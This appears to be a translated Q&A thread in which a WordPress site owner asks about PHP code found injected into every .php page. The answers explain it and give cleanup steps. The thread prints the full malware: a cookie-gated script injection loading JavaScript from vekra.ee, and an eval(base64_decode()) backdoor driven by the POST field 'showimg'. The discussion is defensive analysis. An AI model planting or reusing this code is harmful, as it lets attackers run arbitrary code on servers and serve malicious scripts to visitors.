这个php脚本会做什么?是恶意的PHP代码?

时间:2011-09-14 06:43:11

标签: php

有人可以建议这个PHP代码会做什么吗?我只在每个.php页面上找到了这个代码。其他页面如js / css / php.ini都可以。这是恶意代码吗?如果是,请建议如何防止恶意活动。

以下是代码:

global $sessdt_o;
if(!$sessdt_o) { 
    $sessdt_o = 1; 
    $sessdt_k = "lb11"; 
    if(!@$_COOKIE[$sessdt_k]) { 
        $sessdt_f = "102"; 
        if(!@headers_sent()) { 
            @setcookie($sessdt_k,$sessdt_f); 
        } else { 
            echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
        } 
    } else { 
        if($_COOKIE[$sessdt_k]=="102") { 
            $sessdt_f = (rand(1000,9000)+1); 
            if(!@headers_sent()) { 
                @setcookie($sessdt_k,$sessdt_f); 
            } else { 
                echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; 
            } 
            $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; 
            $sessdt_v = urlencode(strrev($sessdt_j)); 
            $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); 
            echo "<script src='$sessdt_u'></script>"; 
            echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; 
        } 
    } 
    $sessdt_p = "showimg"; 
    if(isset($_POST[$sessdt_p])){ 
        eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));
        exit;
    }
}

4 个答案:

答案 0 :(得分:1)

它更有可能将您的每个页面重定向到攻击者网站。 @将暂停所有错误,因此您不会从此脚本中获取任何日志。

如果您希望自己的网站正常运行,则应将其删除。

编辑:它不会重定向,但会在您的网页上注入任何想要的内容。 它检查cookie的脚本的第二部分将从他的网站添加一个javascript,并可以做恶意的事情。

最后一部分我认为没有人会猜到它是什么,因为它依赖于一些post变量而且$_POST['showimg'],我猜他用POST攻击了你的网站。

要做的事情:更改密码,检查文件的写入权限,不应该是0777,备份数据库和WordPress模板,删除WordPress安装并从头开始重新安装。在模板中搜索他的代码,然后添加清理过的模板。

答案 1 :(得分:1)

我没有仔细检查过,但只有一行

eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));

已经告诉我,如果不是恶意的,那么非常接近 - 可以进行代码注入。

答案 2 :(得分:1)

你的问题不是代码本身,而是它首先出现的问题。您需要检查文件/文件夹的写入权限,以确保外部没有人可以修改它们。

您提到您正在使用wordpress,请阅读this article有关加强wordpress安全性的信息。我建议您锁定您的博客(如果可行),直到您解决安全问题为止。

答案 3 :(得分:0)

我是一名安全分析师,我相信当且仅当您没有该cookie时,它才会将您重定向到可能的恶意网站。如果您已经拥有该cookie,则该脚本将知道您已经在那里并且可能正在研究恶意软件,从而不执行重定向。图像可能类似于检测调试器预设API ..这只是我的意见。